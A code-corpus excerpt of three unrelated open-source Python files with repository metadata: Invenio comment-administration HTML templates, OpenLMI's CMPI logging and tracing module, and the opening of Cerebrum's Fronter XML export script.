cmt_tuple[3],#body
cmt_tuple[5],#status
0,
None, #reply_link
None, #report_link
None, #undelete_link
None)) #delete_links
users.append(self.tmpl_admin_user_info(ln,
meta_data[0], #nickname
meta_data[1], #uid
meta_data[2]))#email
if reviews:
status = cmt_tuple[9]
else:
status = cmt_tuple[5]
comments_info.append(self.tmpl_admin_review_info(ln,
reviews,
meta_data[5], # nb abuse reports
meta_data[3], # cmt_id
meta_data[4], # rec_id
status)) # status
checkboxes.append(self.tmpl_admin_select_comment_checkbox(meta_data[3]))
form_link = "%s/admin/webcomment/webcommentadmin.py/del_com?ln=%s" % (CFG_SITE_URL, ln)
out = """
<table class="admin_wvar" style="width:100%%;">
<thead>
<tr class="adminheaderleft">
<th>%(review_label)s</th>
<th>%(written_by_label)s</th>
<th>%(review_info_label)s</th>
<th>%(select_label)s</th>
</tr>
</thead>
<tbody>""" % {'review_label': reviews and _("Review") or _("Comment"),
'written_by_label': _("Written by"),
'review_info_label': _("General informations"),
'select_label': _("Select")}
for i in range (0, len(comments)):
out += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintd" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (comments[i], users[i], comments_info[i], checkboxes[i])
out += """
</tbody>
</table>"""
if reviews:
action_display = {
'delete': _('Delete selected reviews'),
'unreport': _('Suppress selected abuse report'),
'undelete': _('Undelete selected reviews')
}
else:
action_display = {
'undelete': _('Undelete selected comments'),
'delete': _('Delete selected comments'),
'unreport': _('Suppress selected abuse report')
}
form = self.tmpl_create_multiple_actions_form(form_name="admin_comment",
form_action=form_link,
method="post",
action_display=action_display,
action_field_name='action',
button_label=_("OK"),
button_name="okbutton",
content=out)
if uid > 0:
header = '<br />'
if reviews:
header += _("Here are the reported reviews of user %s") % uid
else:
header += _("Here are the reported comments of user %s") % uid
header += '<br /><br />'
if comID > 0 and recID <= 0 and uid <= 0:
if reviews:
header = '<br />' +_("Here is review %s")% comID + '<br /><br />'
else:
header = '<br />' +_("Here is comment %s")% comID + '<br /><br />'
if uid > 0 and comID > 0 and recID <= 0:
if reviews:
header = '<br />' + _("Here is review %(x_cmtID)s written by user %(x_user)s") % {'x_cmtID': comID, 'x_user': uid}
else:
header = '<br />' + _("Here is comment %(x_cmtID)s written by user %(x_user)s") % {'x_cmtID': comID, 'x_user': uid}
header += '<br/ ><br />'
if comID <= 0 and recID <= 0 and uid <= 0:
header = '<br />'
if reviews:
header += _("Here are all reported reviews sorted by the most reported")
else:
header += _("Here are all reported comments sorted by the most reported")
header += "<br /><br />"
elif recID > 0:
header = '<br />'
if reviews:
header += _("Here are all reviews for record %i, sorted by the most reported" % recID)
header += '<br /><a href="%s/admin/webcomment/webcommentadmin.py/delete?comid=&recid=%s&reviews=0">%s</a>' % (CFG_SITE_URL, recID, _("Show comments"))
else:
header += _("Here are all comments for record %i, sorted by the most reported" % recID)
header += '<br /><a href="%s/admin/webcomment/webcommentadmin.py/delete?comid=&recid=%s&reviews=1">%s</a>' % (CFG_SITE_URL, recID, _("Show reviews"))
header += "<br /><br />"
return coll_form + header + form
def tmpl_admin_del_com(self, del_res, ln=CFG_SITE_LANG):
"""
@param del_res: list of the following tuple (comment_id, was_successfully_deleted),
was_successfully_deleted is boolean (0=false, >0=true
"""
_ = gettext_set_language(ln)
table_rows = ''
for deltuple in del_res:
table_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (deltuple[0], deltuple[1]>0 and _("Yes") or "<span class=\"important\">" +_("No") + "</span>")
out = """
<table class="admin_wvar">
<tr class="adminheaderleft">
<td style="padding-right:10px;">%s</td>
<td>%s</td>
</tr>%s
<table>""" % (_("comment ID"), _("successfully deleted"), table_rows)
return out
def tmpl_admin_undel_com(self, del_res, ln=CFG_SITE_LANG):
"""
@param del_res: list of the following tuple (comment_id, was_successfully_undeleted),
was_successfully_undeleted is boolean (0=false, >0=true
"""
_ = gettext_set_language(ln)
table_rows = ''
for deltuple in del_res:
table_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (deltuple[0], deltuple[1]>0 and _("Yes") or "<span class=\"important\">" +_("No") + "</span>")
out = """
<table class="admin_wvar">
<tr class="adminheaderleft">
<td style="padding-right:10px;">%s</td>
<td>%s</td>
</tr>%s
<table>""" % (_("comment ID"), _("successfully undeleted"), table_rows)
return out
def tmpl_admin_suppress_abuse_report(self, del_res, ln=CFG_SITE_LANG):
"""
@param del_res: list of the following tuple (comment_id, was_successfully_deleted),
was_successfully_deleted is boolean (0=false, >0=true
"""
_ = gettext_set_language(ln)
table_rows = ''
for deltuple in del_res:
table_rows += """
<tr>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
<td class="admintdleft" style="padding: 5px; border-bottom: 1px solid lightgray;">%s</td>
</tr>""" % (deltuple[0], deltuple[1]>0 and _("Yes") or "<span class=\"important\">" +_("No") + "</span>")
out = """
<table class="admin_wvar">
<tr class="adminheaderleft">
<td style ="padding-right: 10px;">%s</td>
<td>%s</td>
</tr>%s
<table>""" % (_("comment ID"), _("successfully suppressed abuse report"), table_rows)
return out
def tmpl_mini_review(self, recID, ln=CFG_SITE_LANG, action='SUBMIT',
avg_score=0, nb_comments_total=0):
"""Display the mini version of reviews (only the grading part)"""
_ = gettext_set_language(ln)
url = '%s/record/%s/reviews/add?ln=%s&action=%s' % (CFG_SITE_URL, recID, ln, action)
if avg_score > 0:
score = _("Average review score: %(x_nb_score)s based on %(x_nb_reviews)s reviews") % \
{'x_nb_score': '<b>%.1f</b>' % avg_score,
'x_nb_reviews': nb_comments_total}
else:
score = '(' +_("Not yet reviewed") + ')'
if avg_score == 5:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'full', 'full'
elif avg_score >= 4.5:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'full', 'half'
elif avg_score >= 4:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'full', ''
elif avg_score >= 3.5:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', 'half', ''
elif avg_score >= 3:
s1, s2, s3, s4, s5 = 'full', 'full', 'full', '', ''
elif avg_score >= 2.5:
s1, s2, s3, s4, s5 = 'full', 'full', 'half', '', ''
elif avg_score >= 2:
s1, s2, s3, s4, s5 = 'full', 'full', '', '', ''
elif avg_score >= 1.5:
s1, s2, s3, s4, s5 = 'full', 'half', '', '', ''
elif avg_score == 1:
s1, s2, s3, s4, s5 = 'full', '', '', '', ''
else:
s1, s2, s3, s4, s5 = '', '', '', '', ''
out = '''
<small class="detailedRecordActions">%(rate)s:</small><br /><br />
<div style="margin:auto;width:160px;">
<span style="display:none;">Rate this document:</span>
<div class="star %(s1)s" ><a href="%(url)s&score=1">1</a>
<div class="star %(s2)s" ><a href="%(url)s&score=2">2</a>
<div class="star %(s3)s" ><a href="%(url)s&score=3">3</a>
<div class="star %(s4)s" ><a href="%(url)s&score=4">4</a>
<div class="star %(s5)s" ><a href="%(url)s&score=5">5</a></div></div></div></div></div>
<div style="clear:both"> </div>
</div>
<small>%(score)s</small>
''' % {'url': url,
'score': score,
'rate': _("Rate this document"),
's1': s1,
's2': s2,
's3': s3,
's4': s4,
's5': s5
}
return out
def tmpl_email_new_comment_header(self, recID, title, reviews,
comID, report_numbers,
can_unsubscribe=True,
ln=CFG_SITE_LANG, uid=-1):
"""
Prints the email header used to notify subscribers that a new
comment/review was added.
@param recid: the ID of the commented/reviewed record
@param title: the title of the commented/reviewed record
@param reviews: True if it is a review, else if a comment
@param comID: the comment ID
@param report_numbers: the report number(s) of the record
@param can_unsubscribe: True if user can unsubscribe from alert
@param ln: language
"""
# load the right message language
_ = gettext_set_language(ln)
user_info = collect_user_info(uid)
out = _("Hello:") + '\n\n' + \
(reviews and _("The following review was sent to %(CFG_SITE_NAME)s by %(user_nickname)s:") or \
_("The following comment was sent to %(CFG_SITE_NAME)s by %(user_nickname)s:")) % \
{'CFG_SITE_NAME': CFG_SITE_NAME,
'user_nickname': user_info['nickname']}
out += '\n(<%s>)' % (CFG_SITE_URL + '/record/' + str(recID))
out += '\n\n\n'
return out
def tmpl_email_new_comment_footer(self, recID, title, reviews,
comID, report_numbers,
can_unsubscribe=True,
ln=CFG_SITE_LANG):
"""
Prints the email footer used to notify subscribers that a new
comment/review was added.
@param recid: the ID of the commented/reviewed record
@param title: the title of the commented/reviewed record
@param reviews: True if it is a review, else if a comment
@param comID: the comment ID
@param report_numbers: the report number(s) of the record
@param can_unsubscribe: True if user can unsubscribe from alert
@param ln: language
"""
# load the right message language
_ = gettext_set_language(ln)
out = '\n\n-- \n'
out += _("This is an automatic message, please don't reply to it.")
out += '\n'
out += _("To post another comment, go to <%(x_url)s> instead.") % \
{'x_url': CFG_SITE_URL + '/record/' + str(recID) + \
(reviews and '/reviews' or '/comments') + '/add'}
out += '\n'
if not reviews:
out += _("To specifically reply to this comment, go to <%(x_url)s>") % \
{'x_url': CFG_SITE_URL + '/record/' + str(recID) + \
'/comments/add?action=REPLY&comid=' + str(comID)}
out += '\n'
if can_unsubscribe:
out += _("To unsubscribe from this discussion, go to <%(x_url)s>") % \
{'x_url': CFG_SITE_URL + '/record/' + str(recID) + \
'/comments/unsubscribe'}
out += '\n'
out += _("For any question, please use <%(CFG_SITE_SUPPORT_EMAIL)s>") % \
{'CFG_SITE_SUPPORT_EMAIL': CFG_SITE_SUPPORT_EMAIL}
return out
def tmpl_email_new_comment_admin(self, recID):
"""
Prints the record information used in the email to notify the
system administrator that a new comment has been posted.
@param recID: the ID of the commented/reviewed record
"""
out = ""
title = get_fieldvalues(recID, "245__a")
authors = ', '.join(get_fieldvalues(recID, "100__a") + get_fieldvalues(recID, "700__a"))
#res_author = ""
#res_rep_num = ""
#for author in authors:
# res_author = res_author + ' ' + author
dates = get_fieldvalues(recID, "260__c")
report_nums = get_fieldvalues(recID, "037__a")
report_nums += get_fieldvalues(recID, "088__a")
report_nums = ', '.join(report_nums)
#for rep_num in report_nums:
# res_rep_num = res_rep_num + ', ' + rep_num
out += " Title = %s \n" % (title and title[0] or "No Title")
out += " Authors = %s \n" % authors
if dates:
out += " Date = %s \n" % dates[0]
out += " Report number = %s" % report_nums
return out
|
valkyriesavage/invenio
|
modules/webcomment/lib/webcomment_templates.py
|
Python
|
gpl-2.0
| 109,498
|
# -*- Coding:utf-8 -*-
#
# Copyright (C) 2012-2014 Red Hat, Inc. All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: Jan Safranek <jsafrane@redhat.com>
"""
Contains handlers and loggers specific to providers logging running
under cimom.
"""
import logging
import functools
import inspect
from itertools import chain
import os
import sys
# Custom logging levels
TRACE_WARNING = logging.DEBUG - 1
TRACE_INFO = logging.DEBUG - 2
TRACE_VERBOSE = logging.DEBUG - 3
#: Mapping from level name to its number.
LOGGING_LEVELS = {
"critical" : logging.CRITICAL,
"error" : logging.ERROR,
"warning" : logging.WARNING,
"warn" : logging.WARNING,
"info" : logging.INFO,
"debug" : logging.DEBUG,
"trace_warning" : TRACE_WARNING,
"trace_info" : TRACE_INFO,
"trace_verbose" : TRACE_VERBOSE
}
#: This associates special format strings to various logger names
SPECIAL_FORMAT_STRINGS = {
"lmi.providers.cmpi_logging.trace_function_or_method" :
"%(levelname)s:%(message)s"
}
#: Default format string to use in stderr and cmpi handlers.
DEFAULT_FORMAT_STRING = \
"%(levelname)s:%(module)s:%(funcName)s:%(lineno)d - %(message)s"
class DispatchingFormatter(object):
"""
Formatter class for logging module. It allows to predefine different
format string for paricular module names.
There is no way, how to setup this formatter in configuration file.
"""
def __init__(self, formatters, default):
"""
*format* in parameters description can be either ``string`` or
another formatter object.
:param formatters (``dict``) Mapping of module names to *format*.
:param default Default *format*.
"""
for k, formatter in formatters.items():
if isinstance(formatter, basestring):
formatters[k] = logging.Formatter(formatter)
self._formatters = formatters
if isinstance(default, basestring):
default = logging.Formatter(default)
self._default_formatter = default
def format(self, record):
"""
Interface for logging module.
"""
formatter = self._formatters.get(record.name, self._default_formatter)
return formatter.format(record)
class CMPILogHandler(logging.Handler):
"""
A handler class, which sends log messages to CMPI log.
"""
def __init__(self, cmpi_logger, *args, **kwargs):
self.cmpi_logger = cmpi_logger
logging.Handler.__init__(self, *args, **kwargs)
def emit(self, record):
msg = self.format(record)
msg = msg.encode('utf-8') if isinstance(msg, unicode) else str(msg)
if record.levelno >= logging.ERROR:
self.cmpi_logger.log_error(msg)
elif record.levelno >= logging.WARNING:
self.cmpi_logger.log_warn(msg)
elif record.levelno >= logging.INFO:
self.cmpi_logger.log_info(msg)
elif record.levelno >= logging.DEBUG:
self.cmpi_logger.log_debug(msg)
elif record.levelno >= TRACE_WARNING:
self.cmpi_logger.trace_warn(record.filename, msg)
elif record.levelno >= TRACE_INFO:
self.cmpi_logger.trace_info(record.filename, msg)
elif record.levelno >= TRACE_VERBOSE:
self.cmpi_logger.trace_verbose(record.filename, msg)
class CMPILogger(logging.getLoggerClass()):
"""
A logger class, which adds trace_method level log methods.
"""
def trace_warn(self, msg, *args, **kwargs):
""" Log message with TRACE_WARNING severity. """
self.log(TRACE_WARNING, msg, *args, **kwargs)
def trace_info(self, msg, *args, **kwargs):
""" Log message with TRACE_INFO severity. """
self.log(TRACE_INFO, msg, *args, **kwargs)
def trace_verbose(self, msg, *args, **kwargs):
""" Log message with TRACE_VERBOSE severity. """
self.log(TRACE_VERBOSE, msg, *args, **kwargs)
def _log(self, level, msg, args, exc_info=None, extra=None):
"""
Overrides ``_log()`` function of basic ``Logger``. The purpose is to
log tracebacks with different level instead of ERROR to prevent them
being logged to syslog.
"""
if logging._srcfile:
#IronPython doesn't track Python frames, so findCaller throws an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func = self.findCaller()
except ValueError:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
None, func, extra)
self.handle(record)
record = self.makeRecord(self.name, TRACE_WARNING, fn,
lno, str(exc_info[1]), tuple(), exc_info, func, extra)
else:
record = self.makeRecord(self.name, level, fn, lno, msg,
args, exc_info, func, extra)
self.handle(record)
logging.setLoggerClass(CMPILogger)
def render_value(val):
"""
When logging values, we want to avoid excessively long messages caused
by rendering argument values like lists, dictionaries etc.
Let's shorten these iterable objects to just one or few items.
:param val: Any value for rendering.
:returns: Representation string of value, possibly shortened.
:rtype: string
"""
if isinstance(val, list):
if len(val) < 2:
return repr(val)
else:
return "[%s, ... (%d more items)]" % (
render_value(val[0]), len(val) - 1)
elif isinstance(val, dict):
if len(val) < 2:
return repr(val)
else:
key = next(iter(val))
return '{%s: %s, ... (%d more items)}' % (
render_value(key), render_value(val[key]), len(val) - 1)
elif isinstance(val, set):
if len(val) < 2:
return repr(val)
else:
return '{%s, ... (%d more items)}' % (
render_value(val[0]), len(val) - 1)
elif isinstance(val, tuple):
return "(%s%s)" % (
", ".join(render_value(i) for i in val),
", " if len(val) < 2 else '')
return repr(val)
def _trace_function_or_method(is_method=False, frame_level=1):
"""
Factory for function and method decorators. Generated decorators
log every calls and exits of decorated functions or methods.
Logged information contain the caller's module and line together with
called function's module, function name and line number.
:param boolean is_method: Whether returned decorator is targeted
for use upon a method of a class. It modified logged function by
prepending owning class name.
:param integer frame_level: Number of nested frames to skip when
searching for called function scope by inspecting stack upwards.
When the result of this function is applied directly on the definition
of function, it's value should be 1. When used from inside of some
other factory, it must be increased by 1.
"""
assert frame_level >= 1
def _decorator(func):
"""
Decorator for logging entries and exits of function or method.
"""
if not inspect.ismethod(func) and not inspect.isfunction(func):
raise TypeError("func must be a function")
module = func.__module__.split('.')[-1]
frm = inspect.currentframe()
for _ in range(frame_level):
frm = frm.f_back
lineno = frm.f_lineno
del frm
classname = inspect.getouterframes(
inspect.currentframe())[frame_level][3]
@functools.wraps(func)
def _wrapper(*args, **kwargs):
"""
Wrapper for function or method, that does the logging.
"""
logger = logging.getLogger(__name__+'.trace_function_or_method')
logargs = {}
if logger.isEnabledFor(TRACE_VERBOSE):
frm = inspect.currentframe()
logargs.update({
"caller_file" : os.path.basename(os.path.splitext(
frm.f_back.f_code.co_filename)[0]),
"caller_lineno" : frm.f_back.f_lineno,
"module" : module,
"func" : classname + "." + func.__name__
if is_method else func.__name__,
"lineno" : lineno,
"action" : "entering",
"args" : ", ".join(chain(
(render_value(a) for a in args),
( "%s=%s"%(k, render_value(v))
for k, v in kwargs.items())))
})
if not logargs["args"]:
logargs["args"] = ""
else:
logargs["args"] = " with args=(%s)" % logargs["args"]
logger.trace_verbose("%(caller_file)s:%(caller_lineno)d - "
"%(action)s %(module)s:%(func)s:%(lineno)d%(args)s",
logargs)
try:
result = func(*args, **kwargs)
if logger.isEnabledFor(TRACE_VERBOSE):
logargs["action"] = "exiting"
logger.trace_verbose("%(caller_file)s:%(caller_lineno)d"
" - %(action)s %(module)s:%(func)s:%(lineno)d",
logargs)
except Exception as exc:
if logger.isEnabledFor(TRACE_VERBOSE):
logargs['action'] = 'exiting'
logargs['error'] = str(exc)
logger.trace_verbose("%(caller_file)s:%(caller_lineno)d"
" - %(action)s %(module)s:%(func)s:%(lineno)d"
" with error: %(error)s", logargs)
raise
return result
return _wrapper
return _decorator
def _trace_function(func, frame_level=1):
""" Convenience function used for decorating simple functions. """
return trace_function_or_method(frame_level=frame_level + 1)(func)
def _trace_method(func, frame_level=1):
""" Convenience function used for decorating methods. """
return trace_function_or_method(True, frame_level + 1)(func)
def _identity_decorator(func, *args, **kwargs):
""" Decorator returning the function itself. """
return func
# Tracing decorators may be disabled by environment variable.
if os.getenv("LMI_DISABLE_TRACING_DECORATORS", "0").lower() in \
("1", "true", "yes", "on"):
# Tracing decators disabled. Functions and method won't get modified
# in any way.
trace_function_or_method = _identity_decorator
trace_function = _identity_decorator
trace_method = _identity_decorator
else:
# Tracing decorators enabled.
trace_function_or_method = _trace_function_or_method
trace_function = _trace_function
trace_method = _trace_method
def try_setup_from_file(config):
"""
Try to configure logging with a file specified in configuration.
:returns: ``True`` if the file configuration is given, successfuly
parsed and carried out.
:rtype: boolean
"""
try:
path = config.file_path('Log', 'FileConfig')
if not os.path.exists(path):
logging.getLogger(__name__).error('given FileConfig "%s" does'
' not exist', path)
else:
logging.config.fileConfig(path)
return True
except Exception:
if config.config.has_option('Log', 'FileConfig'):
logging.getLogger(__name__).exception(
'failed to setup logging from FileConfig')
return False
def setup(env, config, special_format_strings=None):
"""
Set up the logging with options stored in
:py:class:`lmi.base.BaseConfiguration` instance. This should be called
at provider's startup before any message is sent to log.
:param ProviderEnvironment env: Provider environment, taken from CIMOM
callback (e.g. ``get_providers()``).
:param config: Configuration with Log section containing settings for
logging.
:type config: :py:class:`lmi.base.BaseConfiguration`
:param dictionary special_format_strings: Assignes to various loggers
special format strings. It overrides pairs in
:py:data:`SPECIAL_FORMAT_STRINGS`. Its format is following: ::
{ ( 'logger_name' : 'format_string_to_use' ), ... }
"""
if ( special_format_strings is not None
and not isinstance(special_format_strings, dict)):
raise TypeError("special_format_strings must be a dictionary")
if try_setup_from_file(config):
return
logging_level = logging.ERROR
if not config.logging_level in LOGGING_LEVELS:
logging.getLogger(__name__).error(
'level name "%s" not supported', config.logging_level)
else:
logging_level = LOGGING_LEVELS[config.logging_level]
logger = logging.getLogger()
logger.setLevel(logging_level)
# remove any previously set handlers
for handler in logger.handlers[:]:
logger.removeHandler(handler)
format_strings = SPECIAL_FORMAT_STRINGS.copy()
if special_format_strings is not None:
format_strings.update(special_format_strings)
# set up new ones
if config.stderr:
err_handler = logging.StreamHandler()
err_handler.setLevel(logging_level)
err_handler.setFormatter(
DispatchingFormatter(format_strings, DEFAULT_FORMAT_STRING))
logger.addHandler(err_handler)
cmpi_handler = CMPILogHandler(env.get_logger(), logging_level)
cmpi_handler.setFormatter(
DispatchingFormatter(format_strings, DEFAULT_FORMAT_STRING))
logger.addHandler(cmpi_handler)
class LogManager(object):
"""
Class, which takes care of CMPI logging.
There should be only one instance of this class and it should be
instantiated as soon as possible, even before reading a config.
The config file can be provided later by set_config call.
Use of this manager is an alternative to single call to ``setup()``
function of this module.
"""
def __init__(self, env):
"""
Initialize logging.
"""
self._env = env
self._config = None
@property
def config(self):
""" Provider configuration object. """
return self._config
@config.setter
def config(self, config):
"""
Set a configuration of logging. It applies its setting immediately
and also subscribes for configuration changes.
"""
self._config = config
config.add_listener(self._config_changed)
# apply the config
self._config_changed(config)
@property
def cmpi_handler(self):
""" Returns cmpi log handler passing logged messages to cimom. """
for handler in logging.getLogger('').handlers:
if isinstance(handler, CMPILogHandler):
return handler
return CMPILogHandler(self._env.get_logger())
@trace_method
def _config_changed(self, config):
"""
Apply changed configuration, i.e. start/stop sending to stderr
and set appropriate log level.
"""
setup(self._env, config)
def destroy(self):
"""
Shuts down the logging framework. No logging can be done
afterwards.
"""
logging.getLogger(__name__).debug('shutting down logging')
logging.shutdown()
def get_logger(module_name):
"""
Convenience function for getting callable returning logger for particular
module name. It's supposed to be used at module's level to assign its
result to global variable like this:
LOG = cmpi_logging.get_logger(__name__)
This can be used in module's functions and classes like this:
def module_function(param):
LOG().debug("this is debug statement logging param: %s", param)
Thanks to ``LOG`` being a callable, it always returns valid logger object
with current configuration, which may change overtime.
"""
def _logger():
""" Callable used to obtain current logger object. """
return logging.getLogger(module_name)
return _logger
|
openlmi/openlmi-doc
|
doc/python/lmi/providers/cmpi_logging.py
|
Python
|
gpl-2.0
| 17,541
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright 2009-2018 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""This file contains the code to generate an XML file for import into
Fronter, HiØf's LMS.
It works in conjunction with populate_fronter_groups.py and is meant to
complement it -- p_f_g generates the necessary groups whereas g_f_x generates
an XML file from these groups.
All groups making the basis for XML output are tagged with a special trait,
and they have a highly structured name.
The script works like this:
- Grab all group_ids generated by populate_fronter_groups (they are tagged
by a special trait) -- collect_cf_groups.
- Parse undenh/undakt files are build a dict to remap multisemester
entities -- build_multisemester_mapping.
- Build a tree, in memory, representing the fronter tree
(build_cf_tree). The tree is built by successively inserting a node for a
cerebrum group (CfMemberGroup) into the tree
(create_associated_structures). Permissions are registered as well.
- Once the tree is complete, it's output to an XML file. We output (in
order): all the people (output_people), all the groups (structure- and
member -- output_member_groups), all the memberships representing people
being in a group, and finally all the permissions (these are memberships
as well, but between groups only)
- Profit!
"""
from __future__ import unicode_literals
import argparse
import datetime
import logging
import re
from collections import deque
import six
import cereconf
import Cerebrum.logutils
import Cerebrum.logutils.options
from Cerebrum.Utils import Factory
from Cerebrum.utils.atomicfile import SimilarSizeWriter
from Cerebrum.extlib import xmlprinter
from Cerebrum.modules.xmlutils.fsxml2object import EduDataGetter
from Cerebrum.modules.no.hiof.fronter_lib import lower
from Cerebrum.modules.no.hiof.fronter_lib import count_back_semesters
from Cerebrum.modules.no.hiof.fronter_lib import timeslot_is_valid
from Cerebrum.modules.Email import EmailAddress
from Cerebrum.modules.Email import EmailTarget
from Cerebrum.modules.Email import EmailServer
from Cerebrum import Errors
STATUS_ADD = "1"
STATUS_UPDATE = "2"
STATUS_DELETE = "3"
logger = logging.getLogger(__name__)
uname_suffix = ''
@six.python_2_unicode_compatible
class CfPermission(object):
"""Permission handling.
Objects of this class capture the fact that a group has a certain
permission granted on another group.
"""
ROLE_READ = '01'
ROLE_WRITE = '02'
ROLE_DELETE = '06'
ROLE_CHANGE = '07'
access2symbol = {
ROLE_READ: "READ",
ROLE_WRITE: "WRITE",
ROLE_DELETE: "DELETE",
ROLE_CHANGE: "CHANGE",
}
def __init__(self, access_type, recursive, holder, target):
# Does the permission apply recursively?
self._recursive = recursive
# read/write/delete/change
self._access = access_type
# the group that has the permissions on target
self._holder = holder
# the 'victim' of the permission assignment
self._target = target
assert self._access in self.access2symbol
def access_type(self):
return self._access
def is_recursive(self):
return self._recursive
def target(self):
return self._target
def holder(self):
return self._holder
def __str__(self):
return "cf_perm %s (%s) for %s on %s" % (
self.access2symbol[self.access_type()],
self.is_recursive() and "recursive" or "non-recursive",
self.holder(),
self.target())
class CfTree(object):
"""
Representation of the data structure to be pushed to the XML file.
"""
def __init__(self, db):
self._root = None
self._person_group_holder = None
self._cf_id2node = dict()
self._db = db
self._build_static_nodes()
def _build_static_nodes(self):
"""Build the static part of OA/hiof's CF tree"""
self._root = CfStructureGroup("Oslofjordalliansen", "root", None)
self.register_structure_group(self._root)
hiof = CfStructureGroup("HiØ", "STRUCTURE:hiof.no", self._root)
self.register_structure_group(hiof)
tmp = CfStructureGroup("Automatisk",
"STRUCTURE:hiof.no:automatisk", hiof)
self.register_structure_group(tmp)
tmp = CfStructureGroup("Manuell",
"STRUCTURE:hiof.no:manuell", hiof)
self.register_structure_group(tmp)
# It knows about root, but not the other way
# around. _person_group_holder is somewhat special -- it's a fake
# node: it does not have any members, really, it is only a container
# for all groups with members in them.
self._person_group_holder = CfStructureGroup(
"Samlenode for persongruppene",
"STRUCTURE:hiof.no:persongruppene",
None)
self._person_group_holder._parent = self._root
def get_cf_group(self, cf_id, default=None):
return self._cf_id2node.get(cf_id, default)
def register_member_group(self, cfmg):
assert isinstance(cfmg, CfMemberGroup)
cf_group_id = cfmg.cf_id()
self._cf_id2node[cf_group_id] = cfmg
def register_structure_group(self, cfsg):
assert isinstance(cfsg, CfStructureGroup)
cf_group_id = cfsg.cf_id()
self._cf_id2node[cf_group_id] = cfsg
def create_associated_siblings(self, cf_group):
"""Create sibling nodes stemming from a given node.
NB! This creates cf_structure_groups only.
"""
for s_name, s_id in cf_group.cf_yield_siblings():
if self.get_cf_group(s_id):
continue
parent = self.get_cf_group(cf_group.cf_parent_id())
assert parent is not None
nn = CfStructureGroup(s_name, s_id, parent)
self.register_structure_group(nn)
parent.add_child(nn)
logger.debug("Created sibling %s from %s under parent %s",
nn, cf_group, parent)
def create_associated_structures(self, cf_group, multisemester_map):
"""Given a cf_member/structure_group, create *ALL* the necessary
associated groups upwards in the structure tree.
cf_group may be either a cf_structure_group or a CfMemberGroup.
For cf_structure_group we figure out which group is the parent. If it
does not exist, it's created (recursively).
For CfMemberGroup we figure out which structure group it corresponds
to. If it does not exist, it's created (recursively).
@return:
This returns a group that cf_group should be associated
with. I.e. cf_group's 'closest' node in the structure hierarchy
"""
if cf_group.cf_id() in multisemester_map:
structure_id = multisemester_map[cf_group.cf_id()]
logger.debug("Selecting a remapped parent-id: %s -> %s",
cf_group.cf_id(), structure_id)
else:
structure_id = cf_group.cf_parent_id()
if structure_id is None:
logger.debug("No structure created for cf_group=%s", cf_group)
return None
if self.get_cf_group(structure_id):
self.get_cf_group(structure_id).add_child(cf_group)
self.create_associated_siblings(cf_group)
return self.get_cf_group(structure_id)
# No parent -> create new one
# Regardless of cf_group's type, we create cf_structure_groups only.
logger.debug("Creating new node id=%s (parent for %s)",
structure_id, cf_group.cf_id())
new_node = CfStructureGroup(cf_group.cf_parent_title(),
structure_id,
# None, since we don't know what the
# parent is at this point.
None)
self.register_structure_group(new_node)
new_node.add_child(cf_group)
self.create_associated_siblings(cf_group)
# This will eventually stop at a node that already exist, since we
# have several static nodes in the tree.
grandparent_node = self.create_associated_structures(new_node,
multisemester_map)
# This will fix new_node's parent link as well.
grandparent_node.add_child(new_node)
return new_node
def iterate_groups(self, group_type=None):
"""Create an iterator for the specific group type in the CF-tree.
"""
for seq in (self._cf_id2node.itervalues(),
(self._person_group_holder,)):
for group in seq:
if (group_type is None or
isinstance(group, group_type)):
yield group
def iterate_groups_topologically(self, group_type=None):
"""Create an iterator for the specific group type(s) that outputs
groups in topological order.
Fronter requires parent groups to be output before children, in order
for their import routines to function properly.
"""
if not self._root:
return
work_queue = deque((self._root, self._person_group_holder))
while work_queue:
current = work_queue.popleft()
if group_type is None or isinstance(current, group_type):
yield current
# Enqueue all the children (CfMemberGroup does not have
# structural children, which are of interest here)
if not isinstance(current, CfStructureGroup):
continue
for child_group in current.iterate_children(group_type):
work_queue.append(child_group)
def get_root(self):
return self._root
class CfGroupInterface(object):
"""An interface capturing the common functionality of person- and structure
groups.
"""
_acronym2avdeling = None
